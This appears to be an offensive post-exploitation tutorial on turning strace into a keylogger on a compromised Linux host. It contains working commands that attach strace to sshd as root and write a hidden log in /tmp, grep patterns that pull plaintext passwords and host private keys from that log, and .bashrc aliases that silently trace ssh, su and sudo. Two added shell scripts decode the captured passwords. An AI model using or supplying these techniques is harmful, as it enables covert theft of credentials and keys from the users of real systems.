Introduction
strace is a dynamic tracing tool that records the system calls a process makes. Because read() and write() see data in plaintext (before encryption or after decryption), attaching strace to the right process turns it into a keylogger backdoor that widens the range of credentials we can collect.
Usage scenario
We already have a shell on the host by some other means, but no password was found in shell history, in captured traffic or in local files. We want the password of the current host, or the passwords used from this host to log in to other hosts.
Record the plaintext password of the sshd process
Execute the following command as root (attaching to sshd requires ptrace permission over a root process). strace writes its trace to stderr, hence the 2> redirection; the surrounding subshell and the trailing & leave it running in the background, detached from the current shell:
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk '{print $2}'` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
-f follows the per-connection children that sshd forks, -t timestamps every call and -s 32 keeps the first 32 bytes of each string argument. Note that the tracer is not hidden: strace appears in the process list, and every traced sshd process reports its PID in the TracerPid field of /proc/<pid>/status.
When a user then logs in with a password, view it with:
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log
The password is handed from the unprivileged sshd child to the privileged monitor process over a socketpair as a 4-byte big-endian length followed by the password bytes, which is the \0\0\0\<length> sequence the pattern looks for. The descriptor number (6 here) can differ between systems and OpenSSH versions; if nothing matches, drop the 6 from the pattern.
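The grep above only finds the matching lines; the following added example (not part of the original post) goes one step further and decodes them into the bare passwords. It assumes the layout of OpenSSH's privilege-separation request, a 1-byte request type (12 = MONITOR_REQ_AUTHPASSWORD, which strace prints as \f), a 4-byte length and the password bytes, which is an assumption about the monitor protocol rather than something the post states, and it runs on a constructed sample log, not on a real capture.

```shell
#!/bin/sh
# Added example, not from the original post: pull plaintext passwords out of
# an sshd strace log produced by the command above.
#
# Assumption (OpenSSH privilege separation): the network child forwards the
# password to the root monitor as one request, i.e. a 1-byte request type
# (12 = MONITOR_REQ_AUTHPASSWORD, shown by strace as \f), a 4-byte big-endian
# length and the password bytes.  strace prints that read() as, for example,
#   read(6, "\f\0\0\0\10password", 13) = 13
# The descriptor number varies, so it is not hard-coded here.
#
# Limits: passwords must be shorter than 32 bytes (longer ones are cut by
# -s 32 and get a printable length byte), and a '"' or '\' inside the
# password ends the extracted value early because strace escapes them.

extract_sshd_passwords() {
    # Group 1: the length byte, an octal escape such as \10 or one of \t \n \v \f \r.
    # Group 2: the password, up to the closing quote or the next escape.
    sed -n -E 's/.*read\([0-9]+, "\\f\\0\\0\\0\\([0-7]{1,3}|[tnvfr])([^"\\]+).*/\2/p' "$1"
}

# Constructed sample log (not a real capture): two password logins, the
# 4-byte length reads that precede each request, and a MONITOR_REQ_PWNAM
# request (type 8 = \10) carrying the user name, which must not be reported.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
[pid 23456] 14:02:10 read(6, "\0\0\0\t", 4) = 4
[pid 23456] 14:02:10 read(6, "\10\0\0\0\4root", 9) = 9
[pid 23456] 14:02:11 read(6, "\0\0\0\r", 4) = 4
[pid 23456] 14:02:11 read(6, "\f\0\0\0\10Passw0rd", 13) = 13
[pid 23456] 14:02:11 write(6, "\0\0\0\2", 4) = 4
[pid 23458] 14:03:40 read(6, "\0\0\0\22", 4) = 4
[pid 23458] 14:03:40 read(6, "\f\0\0\0\rhunter2hunter", 18) = 18
EOF

# Prints one password per line: Passw0rd, then hunter2hunter.
extract_sshd_passwords "$SAMPLE_LOG"
```

Against a real capture, call it as `extract_sshd_passwords /tmp/.sshd.log`. Requiring the \f type byte in front of the length is what keeps other length-prefixed strings on the same socketpair (user names, key blobs) out of the output, which the plain grep does not do.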
Record the sshd private key
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk '{print $2}'` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)
The larger -s value keeps a whole key inside a single read() string. Note what this can and cannot capture: when a user logs in with a key, only a signature is sent, so the client's private key never reaches the server. What the per-connection sshd process does read on common OpenSSH versions is the server's own host private keys, so after the next login (password or key) view them with:
grep 'PRIVATE KEY' /tmp/.sshd.log
Record ssh client login credentials
We can also record the execution of commands such as ssh and su on this machine; ssh is used as the example here.
- Modify the alias
# Add the following line to ~/.bashrc (or /etc/bashrc for all users), e.g. with vi ~/.bashrc.
# The single quotes keep $(date ...) unexpanded at definition time, so every ssh invocation gets its own log file.
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-$(date +%d%h%m%s).log -s 32 ssh'
# Take effect immediately
source ~/.bashrc
- Run
ssh 10.xx.xx.148 -l mysql
There will now be one log file per ssh invocation in /tmp/, named .ssh-<date>.log (with the format above the name looks like .ssh-202月021613809979.log, since %h is the locale's month abbreviation).
Read the password recorded in the log:
grep -A 9 'password' /tmp/.ssh-202月021613809979.log
The ssh client writes the prompt to the terminal and then reads the reply one byte per read() call, so each of the lines following the prompt holds a single typed character and the line containing "\n" marks the end of the password. Raise the -A count for passwords longer than eight characters.
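Instead of reading the one-character lines by eye, the following added example (not part of the original post) reassembles them into the typed password. It assumes the behaviour of OpenSSH's readpassphrase(): the prompt is written to the tty descriptor and the reply is read back from the same descriptor one byte per read() until "\n" or "\r". The log it runs on is constructed, and the host 192.0.2.10 in it is a placeholder, not the page's host.

```shell
#!/bin/sh
# Added example, not from the original post: rebuild the password typed into
# the ssh client from the log written by the strace alias above.
#
# Assumption (OpenSSH readpassphrase()): the client writes the prompt to
# /dev/tty and then reads the answer from the same descriptor one byte per
# read() call until it sees "\n" or "\r".  Lines may or may not carry a
# "[pid N]" prefix, depending on whether the client forked.

extract_tty_passwords() {
    awk '
        # A prompt write such as  write(4, "user@host password: ", 23) = 23
        # starts collecting on that descriptor.
        /write\([0-9]+, ".*[Pp]assword: ?"/ {
            fd = $0; sub(/^.*write\(/, "", fd); sub(/,.*/, "", fd)
            pw = ""; collecting = 1; next
        }
        # One-byte reads on that descriptor are the typed characters.
        collecting && $0 ~ ("read\\(" fd ", \".*\", 1\\) = 1$") {
            ch = $0
            sub(/^.*read\([0-9]+, "/, "", ch); sub(/", 1\) = 1$/, "", ch)
            if (ch == "\\n" || ch == "\\r") { print pw; collecting = 0; next }
            if (ch == "\\\"") ch = "\""        # strace escapes a typed quote ...
            else if (ch == "\\\\") ch = "\\"   # ... and a typed backslash
            pw = pw ch
        }
    ' "$1"
}

# Constructed sample log (not a real capture): a mistyped password, the
# server rejection, then the correct password containing a double quote.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
write(5, "SSH-2.0-OpenSSH_8.9\r\n", 21) = 21
read(5, "SSH-2.0-OpenSSH_8.4p1 Debian-5\r\n", 8192) = 32
write(4, "mysql@192.0.2.10's password: ", 29) = 29
read(4, "w", 1) = 1
read(4, "r", 1) = 1
read(4, "o", 1) = 1
read(4, "n", 1) = 1
read(4, "g", 1) = 1
read(4, "\n", 1) = 1
write(4, "\n", 1) = 1
write(2, "Permission denied, please try again.\n", 37) = 37
write(4, "mysql@192.0.2.10's password: ", 29) = 29
read(4, "S", 1) = 1
read(4, "3", 1) = 1
read(4, "c", 1) = 1
read(4, "\"", 1) = 1
read(4, "r", 1) = 1
read(4, "e", 1) = 1
read(4, "t", 1) = 1
read(4, "\n", 1) = 1
write(4, "\n", 1) = 1
EOF

# Prints one line per prompt: wrong, then S3c"ret.
extract_tty_passwords "$SAMPLE_LOG"
```

Run it as `extract_tty_passwords /tmp/.ssh-<date>.log`. Every prompt yields its own line, so a failed first attempt and the successful retry both appear, in order. Whether the same reassembly applies to the su and sudo logs depends on whether those programs also read the terminal one byte per call, which has to be checked against the actual log.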
Record sudo and su passwords with aliases
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-$(date +%d%h%m%s).log -s 32 sudo'
alias su='strace -f -e trace=read,write -o /tmp/.su-$(date +%d%h%m%s).log -s 32 su'
Caveat: sudo and su are setuid-root binaries. When an ordinary user runs them under strace, the kernel does not grant the setuid privileges to a traced execve (the tracer lacks CAP_SYS_PTRACE), so sudo aborts with "effective uid is not 0" before it ever asks for a password, and the user notices. These two aliases therefore only capture anything when the shell they are planted in already runs as root or with CAP_SYS_PTRACE.